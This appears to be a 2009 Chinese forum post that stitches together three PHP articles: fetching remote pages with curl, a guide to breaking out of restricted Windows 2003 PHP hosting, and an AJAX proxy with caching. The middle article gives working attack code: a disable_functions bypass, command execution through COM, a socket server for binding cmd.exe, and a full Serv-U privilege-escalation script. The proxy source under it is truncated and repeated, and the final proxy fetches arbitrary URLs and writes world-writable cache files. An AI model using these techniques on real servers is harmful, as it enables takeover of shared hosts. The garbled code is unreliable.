标题
[php/c/c++]curl/file_get_contents/allow_url_fopen/php_socket
clq
浏览(0) +
2009-03-26 10:19:45 发表
编辑
关键字:
[php/c/c++]curl/file_get_contents/allow_url_fopen/php_sockets.dll file_get_contents函数不能使用的解决方法 http://www.ccvita.com/161.html 有些主机服务商把php的allow_url_fopen选项是关闭了,就是没法直接使用file_get_contents来获取远程web页面的内容。那就是可以使用另外一个函数curl。 下面是file_get_contents和curl两个函数同样功能的不同写法 file_get_contents函数的使用示例: < ?php $$file_contents = file_get_contents('http://www.ccvita.com/'); echo $$file_contents; ?> 换成curl函数的使用示例: < ?php $$ch = curl_init(); $$timeout = 5; curl_setopt ($$ch, CURLOPT_URL, 'http://www.ccvita.com'); curl_setopt ($$ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($$ch, CURLOPT_CONNECTTIMEOUT, $$timeout); $$file_contents = curl_exec($$ch); curl_close($$ch); echo $$file_contents; ?> 利用function_exists函数来判断php是否支持一个函数可以轻松写出下面函数 < ?php function vita_get_url_content($$url) { if(function_exists('file_get_contents')) { $$file_contents = file_get_contents($$url); } else { $$ch = curl_init(); $$timeout = 5; curl_setopt ($$ch, CURLOPT_URL, $$url); curl_setopt ($$ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($$ch, CURLOPT_CONNECTTIMEOUT, $$timeout); $$file_contents = curl_exec($$ch); curl_close($$ch); } return $$file_contents; } ?> 其实上面的这个函数还有待商榷,如果你的主机服务商把file_get_contents和curl都关闭了,上面的函数就会出现错误。 “file_get_contents函数不能使用的解决方法” 7条回复 1. 淡色黄昏 at 2007-08-02 09:25:44 回复 fopen这个函数也能获得远程页面的内容 2. kimi at 2007-08-02 12:53:12 回复 allow_url_fopen选项关闭的时候 fopen和file_get_contents都是是不能打开远程文件的 3. tiger at 2007-08-02 16:26:50 回复 大部分空间curl都不开的:( 4. Sylar at 2007-08-09 11:33:40 回复 fsocksopen 5. Go_Rush at 2008-04-01 12:50:58 回复 当然, file_get_contents还可以干更多的事情 包括模拟 referer,cookie, 使用 proxy等等 ini_set(’default_socket_timeout’,120); ini_set(’user_agent’,'MSIE 6.0;’); $$context=array(’http’ => array (’header’=> ‘Referer: http://www.ccvita.com/index.php‘, ),); $$xcontext = stream_context_create($$context); echo $$str=file_get_contents(”http://www.fcicq.net/wp/”,FALSE,$$xcontext); 当然,如果是读取提交比较大的资源,还是用 fopen比较合适,也 可以这样干 6. Min at 2008-05-28 13:26:05 回复 既然allow_url_fopen都关了, socket会开吗? 要关就肯定全部关的
clq
突破Windows 2003 PHP服务器的新思路 添加时间:2007-4-22 从WIN2000到WIN XP, 再到WIN2003, MS IIS服务器安全性的提高是显而易见的。 在WIN2000中,一个普通的PHP SHELL便能把它打垮; 在WIN XP, 即使Safe mode = off,你也无法用system() 等函数执行系统命令, 但是我们还能用com()函数进行突破;到WIN 2003,即使IIS 和PHP都是默认安装,你用system(), com()也可能拿它没辙。这时候你就不得不使用一些新的方法来进行突破了。 1、disable_functions的突破 在php -4.0.1以上的版本,php.ini里引入了一项功能disable_functions ,这个功能比较有用,可以用它禁止一些函数。比如在php.ini里加上disable_functions = passthru exec system popen 那么在执行这些函数的时候将会提示Warning: system() has been disabled for security reasons,同时程序终止运行。但是也不是没有办法执行系统命令了。因为php采用了很多perl的特性,比如还可以用(`)来执行命令,示例代码如下: $output = `ls -al`;echo "$output ";?> 据说这个只有设成safe_mode为on才能避免,但上次我在一台国外的服务器上使用的时候还是失败了,人并不是什么时候都能那么走运的:) 2、dl()函数的应用 当任何PHP的内部命令执行数和''都无法使用的时候,可以尝试dl(),该方法只能用于safe mode=off,因为它在安全模式下是被禁用的。利用dl()你可以直接调用W32api 函数,可惜这个扩展已被移动到 PECL 库中,且自PHP 5.1.0以下版本起不再被绑定。以下是手册里的例子: // 加载此扩展 dl("php_w32api.dll"); // 注册 GetTickCount 函数,来自 kernel32.dll w32api_register_function("kernel32.dll", "GetTickCount", "long"); // 注册 MessageBoxA 函数,来自 User32.dll w32api_register_function("User32.dll", "MessageBoxA", "long"); // 取得开机时间信息 $ticks = GetTickCount(); // 转换为易于理解的文本 $secs = floor($ticks / 1000); $mins = floor($secs / 60); $hours = floor($mins / 60); $str = sprintf("You have been using your computer for:". "\r\n %d Milliseconds, or \r\n %d Seconds". "or \r\n %d mins or\r\n %d hours %d mins.", $ticks, $secs, $mins, $hours, $mins - ($hours*60)); // 显示一个消息对话框,只有一个 OK 按钮和上面的开机时间文本 MessageBoxA(NULL, $str, "Uptime Information", MB_OK); ?> 可惜我还没有理解透彻dl()和W32api, 所以就不乱举例子了, 免得误导读者。 3、COM 和 .Net(Windows)函数的应用 COM(Component Object Model,组件对象模型)是微软开发的软件规范,它用于开发面向对象的、编译好的软件组件,它允许把软件抽象成为二进制的部件,主要运用于windows平台。 PHP 的 Windows 版本已经内置该扩展模块的支持。无需加载任何附加扩展库即可使用COM函数。它的使用方法类似于C++或Java中类的创建的语法,并把COM的类名作为参数传递到构造函数。例如使用在PHP中调用“WScript.Shell”执行系统命令: $cmd=” E:/cert/admin/psexec.exe”; if($com=new COM("WScript.Shell")) echo "yes"; if(!$cmd1=$com->exec($cmd)) { echo "can not exec()"; } if(!$cmd2=$cmd1->stdout()) { echo "can not stdout()"; } if(!$cmd3=$cmd2->readall()) { echo "can not readall()"; } echo $cmd3; ?> 图1是我写的一个执行psexec.exe的一个例子。 这段代码与ASP的的意思是一模一样的,当然,你也可以像ASP那样调用“ADODB.Connection”,利用这个组件结合jet2溢出漏洞,可能能够在PHP Saft mode=ON下拿到一个Shell。 //create the database connection $conn = new COM("ADODB.Connection"); $dsn = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("mydb.mdb"); $conn->Open($dsn); //pull the data through SQL string $rs = $conn->Execute("select clients from web"); ….. ?> .Net 函数只能运行在 PHP 5上,当然,它需要 “.Net runtime”的支持,而且这的PHP的一个实验性模块,功能还未齐全,所以在这就不讨论了。 4、Java()函数的应用 该方法适用于safe mode=on。要使用JAVA模块服务器必须事先安装Java虚拟机,而且在PHP安装配置的时候打开了with-java的选项,代码如下: [JAVA] ;这是到php_java.jar的路径 ;java.class.path = .\php_java.jar ;JDK的路径 ;Java.home = f:\jdk1.3.0 ;到虚拟机的路径 ;Java.library=f:\jdk1.3.0\jre\bin\hostspot\jvm.dll 同COM一样,使用Java创建类(不仅仅是JavaBeans)只需把JAVA的类名作为参数传递到构造函数。以下是手册里边的一个例子: // This example is only intended to be run as a CGI. $frame = new Java('java.awt.Frame', 'PHP'); $button = new Java('java.awt.Button', 'Hello Java World!'); $frame->add('North', $button); $frame->validate(); $frame->pack(); $frame->visible = True; $thread = new Java('java.lang.Thread'); $thread->sleep(10000); $frame->dispose(); ?> 可惜能真正支持JAVA的PHP服务器并不多见,所以在这也不多讨论了。 5、socket()函数的应用 socket 是PHP中功能极为强大的一个模块,如果你使用高级的、抽象的接口(由fsockopen()和psockopen函数打开的socket),是不需要打开“php_sockets.dll”的。但是如果要使用完整的socket函数块,就必须在php.ini这样设置: ;Windows Extensions ;Note that MySQL and ODBC support is now built in, so no dll is needed for it. …….. ;去掉以下一句最前边的分号 ;extension=php_sockets.dll 使用PHP的socket函数块可以实现端口转发/重定向、数据包嗅探、本地溢出等功能, nc能做的, 它大部分都能做到。而且,还可以用它构造TCP/UDP服务器, 同时,我觉得它也是突破服务器安全策略的一个最好的办法。以下便是一个在服务器上打开端口构造TCP服务器的例子,你可以用它来捆绑上服务器的cmd.exe: //在服务器上构造TCP服务 //该例子需要php_sockets.dll的支持 //执行后便可使用” telnet 127.0.0.1 1020”连接 error_reporting(E_ALL); /* Allow the script to hang around waiting for connections. */ set_time_limit(0); /* Turn on implicit output flushing so we see what we're getting * as it comes in. */ ob_implicit_flush(); //在服务器上绑定IP和端口 $address = '127.0.0.1'; $port = 1020; if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) { echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n"; } if (($ret = socket_bind($sock, $address, $port)) < 0) { echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n"; } if (($ret = socket_listen($sock, 5)) < 0) { echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n"; } do { if (($msgsock = socket_accept($sock)) < 0) { echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "\n"; break; } /* Send instructions. */ $msg = "\nWelcome to the PHP Test Server. \n" . "To quit, type 'quit'. To shut down the server type 'shutdown'.\n"; socket_write($msgsock, $msg, strlen($msg)); do { if (false === socket_recv($msgsock, $buf , 1024, 0)) { echo "socket_read() failed: reason: " . socket_strerror($ret) . "\n"; break 2; } if (!$buf = trim($buf)) { continue; } if ($buf == 'quit') { break; } if ($buf == 'shutdown') { socket_close($msgsock); break 2; } $talkback = "PHP: You said '$buf'.\n"; socket_write($msgsock, $talkback, strlen($talkback)); echo "$buf\n"; //以下处理接受到的buf /*eg:例如 $buf=”cmd.exe /c netstat –an”; $pp = popen('$buf ', 'r'); While($read = fgets($pp, 2096)) echo $read; pclose($pp); */ } while (true); socket_close($msgsock); } while (true); socket_close($sock); ?> 事实上,很多主机都是没有加载 php_sockets.dll的,庆幸的是,不需要socket模块支持的“fsockopen”函数已经足够我们使用了。因为只要有 “fsockopen”,我们便可以自由地读写本机中未对外部开放的端口。使用fsockopen读写serv-u 的本地管理端口43958 (注: 该端口无法在外部连结) 进行提权便是一个很典型的例子: $adminuser=” LocalAdministrator”; $adminpass=” #l@$ak#.lk;0@P”; $adminport=” 43958”; $fp = fsockopen ("127.0.0.1",$adminport,$errno, $errstr, 8); if (!$fp) { echo "$errstr ($errno) \n"; } else { //可以写入$shellcode // fputs ($fp, $shellcode); fputs ($fp, "USER ".$adminuser."\r\n"); sleep (1); fputs ($fp, "PASS ".$adminpass."\r\n"); sleep (1); fputs ($fp, "SITE MAINTENANCE\r\n"); sleep (1); fputs ($fp, "-SETUSERSETUP\r\n"); fputs ($fp, "-IP=".$addr."\r\n"); fputs ($fp, "-PortNo=".$ftpport."\r\n"); fputs ($fp, "-User=".$user."\r\n"); fputs ($fp, "-Password=".$password."\r\n"); fputs ($fp, "-HomeDir=".$homedir."\r\n"); fputs ($fp, "-LoginMesFile=\r\n"); fputs ($fp, "-Disable=0\r\n"); fputs ($fp, "-RelPaths=0\r\n"); fputs ($fp, "-NeedSecure=0\r\n"); fputs ($fp, "-HideHidden=0\r\n"); fputs ($fp, "-AlwaysAllowLogin=0\r\n"); fputs ($fp, "-ChangePassword=1\r\n"); fputs ($fp, "-QuotaEnable=0\r\n"); fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n"); fputs ($fp, "-SpeedLimitUp=-1\r\n"); fputs ($fp, "-SpeedLimitDown=-1\r\n"); fputs ($fp, "-MaxNrUsers=-1\r\n"); fputs ($fp, "-IdleTimeOut=600\r\n"); fputs ($fp, "-SessionTimeOut=-1\r\n"); fputs ($fp, "-Expire=0\r\n"); fputs ($fp, "-RatioUp=1\r\n"); fputs ($fp, "-RatioDown=1\r\n"); fputs ($fp, "-RatiosCredit=0\r\n"); fputs ($fp, "-QuotaCurrent=0\r\n"); fputs ($fp, "-QuotaMaximum=0\r\n"); fputs ($fp, "-Maintenance=System\r\n"); fputs ($fp, "-PasswordType=Regular\r\n"); fputs ($fp, "-Ratios=None\r\n"); fputs ($fp, " Access=".$homedir."|RWAMELCDP\r\n"); fputs ($fp, "QUIT\r\n"); sleep (1); while (!feof($fp)) { echo fgets ($fp,128); } } ?> 还可以利用fsockopen编写HTTP代理,从而访问外网或本机中无法外部访问的网站。我手上有一个完整的HTTPProxy(图4),代码较长。有兴趣的读者可以看看。 6、MYSQL/MSSQL接口 不同于Linux的是,windows下的mysql/MSSQL一般是以系统管理员身份运行的,因此,只要能拿到本机SQL数据库中的root/sa密码,你就可以直接用PHP连接数据库来执行系统命令。 在Mysql中执行系统命令要利用用户自定义函数“MySQL UDF Dynamic Library”这个漏洞。在MSSQL中只要连接上数据库,就能直接调用“master..xp_cmdshell“扩展执行命令,权限当然是system权限。 总结一下:由于系统、IIS、PHP的版本不一样,以上提到的几个突破方法可能会有所变化,PHP还有许多扩展功能是可以利用的,走出system()那几个系统命令执行函数,你就有可能突破系统安全策略的限制! 后面附上proxy.php的代码 error_reporting(E_ALL); /* // This program is free software; you can redistribute it and/or // modify it under the terms of the GNU General Public License // as published by the Free Software Foundation; either version 2 // of the License, or (at your option) any later version. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with this program; if not, write to the Free Software // Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. //------------------------------------------------------------------- // Class: PHProxy // Author: ultimategamer00 (Abdullah A.) // Last Modified: 6:28 PM 6/22/2004 */ function __stripslashes($str) { return get_magic_quotes_gpc() ? stripslashes($str) : $str; } if (!function_exists('str_rot13')) { function str_rot13($str) { static $alpha = array('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', 'nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM'); return strtr($str, $alpha[0], $alpha[1]); } } class PHProxy { var $allowed_hosts = array(); var $version; var $script_url; var $url; var $url_segments; var $flags = array('include_form' => 1, 'remove_scripts' => 1, 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 1); var $socket; var $content_type; var $request_headers; var $post_body; var $response_headers; var $response_body; function PHProxy($flags = 'previous') { $this->version = '0.2'; $this->script_url = 'http' . (isset( function set_request_headers() { $headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " HTTP/1.0\r\n"; $headers .= "Host: :\r\n"; $headers .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text /plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*; q=0.1\r\n"; $headers .= "Connection: close\r\n"; if ($this->flags['show_referer'] == 1) { $headers .= "Referer: \r\n"; } $cookies = $this->get_cookies(); $headers .= $cookies != '' ? "Cookie: $cookies\r\n" : ''; if ( function set_request_headers() { $headers = " " . (isset($this->url_segments['query']) ? "?" : '') . " HTTP/1.0\r\n"; $headers .= "Host: :\r\n"; $headers .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text /plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*; q=0.1\r\n"; $headers .= "Connection: close\r\n"; if ($this->flags['show_referer'] == 1) { $headers .= "Referer: \r\n"; } $cookies = $this->get_cookies(); $headers .= $cookies != '' ? "Cookie: $cookies\r\n" : ''; if (
clq
php自建proxy和cache解决ajax跨域读取XML文件的问题 Posted by admin on 9 11, 2008 in PHP | 订阅 在网页中嵌入其他域下的xml数据的时候,由于有跨域的问题,因此ajax的代码不能直接访问。 而因为这些xml的所在域是别人的服务器,因此不能要求其提供跨域frame。 解决方法之一就是使用proxy,将内容用本地服务器转发一次。 proxy.php if (!isset($_GET['url'])) exit; $url = $_GET['url']; $fp = file_get_contents($url); echo $fp; ?> 调用方法就是http://www.yourname.com/proxy.php?url=xxxxxxxxx 接下来的问题是如果每次申请这个xml内容,服务器都去file_get_contents消耗也挺大的,这里引入一个auto_cache.php进行处理: /** * auto_cache.php 实现智能的自动缓存。 * 使用办法极其简单: * 在需要实现缓存功能的页面 require ‘auto_cache.php’; 就ok了 * @author rains31@gmail.com */ //存放缓存的根目录,最好是放到/tmp目录,尤其是虚拟主机用户,因为/tmp目录不占自己的主页空间啊:) define(’CACHE_ROOT’, ‘/tmp’); //缓存文件的生命期,单位秒,900秒是15分钟 define(’CACHE_LIFE’, 900); //缓存文件的扩展名,不要使用脚本文件后缀,如 .php .asp .jsp .pl 等等 define(’CACHE_SUFFIX’,’.cache’); //缓存文件名 $file_name = md5($_SERVER['REQUEST_URI']).CACHE_SUFFIX; //缓存目录,根据md5的前两位把缓存文件分散开。避免文件过多。如果有必要,可以用第三四位为名,再加一层目录。 //256个目录每个目录1000个文件的话,就是25万个页面。两层目录的话就是65536*1000=六千五百万。 //不要让单个目录多于1000,以免影响性能。 $cache_dir = CACHE_ROOT.’/’.substr($file_name,0,2); //缓存文件 $cache_file = $cache_dir.’/’.$file_name; //GET方式请求才缓存,POST之后一般都希望看到最新的结果 if($_SERVER['REQUEST_METHOD']==’GET’) { //如果缓存文件存在,并且没有过期,就把它读出来。 if(file_exists($cache_file) && time()-filemtime($cache_file) { $fp = fopen($cache_file,’rb’); fpassthru($fp); fclose($fp); exit; } elseif(!file_exists($cache_dir)) { if(!file_exists(CACHE_ROOT)) { mkdir(CACHE_ROOT,0777); chmod(CACHE_ROOT,0777); } mkdir($cache_dir,0777); chmod($cache_dir,0777); } //回调函数,当程序结束时自动调用此函数 function auto_cache($contents) { global $cache_file; $fp = fopen($cache_file,’wb’); fwrite($fp,$contents); fclose($fp); chmod($cache_file,0777); //生成新缓存的同时,自动删除所有的老缓存。以节约空间。 clean_old_cache(); return $contents; } function clean_old_cache() { chdir(CACHE_ROOT); foreach (glob(”*/*”.CACHE_SUFFIX) as $file) { if(time()-filemtime($file)>CACHE_LIFE) { unlink($file); } } } //回调函数 auto_cache ob_start(’auto_cache’); } else { //不是GET的请求就删除缓存文件。 if(file_exists($cache_file))unlink($cache_file); } ?> 然后在proxy.php中加入这一行: if (!isset($_GET['url'])) exit; $url = $_GET['url']; require ‘auto_cache.php’; $fp = file_get_contents($url); echo $fp; ?> 至此,避免了ajax跨域访问,而同时15分钟才更新同一个url的缓存,对服务器来说,负荷也不算大。
NEWBT官方QQ群1: 276678893
可求档连环画,漫画;询问文本处理大师等软件使用技巧;求档softhub软件下载及使用技巧.
但不可"开车",严禁国家敏感话题,不可求档涉及版权的文档软件.
验证问题说明申请入群原因即可.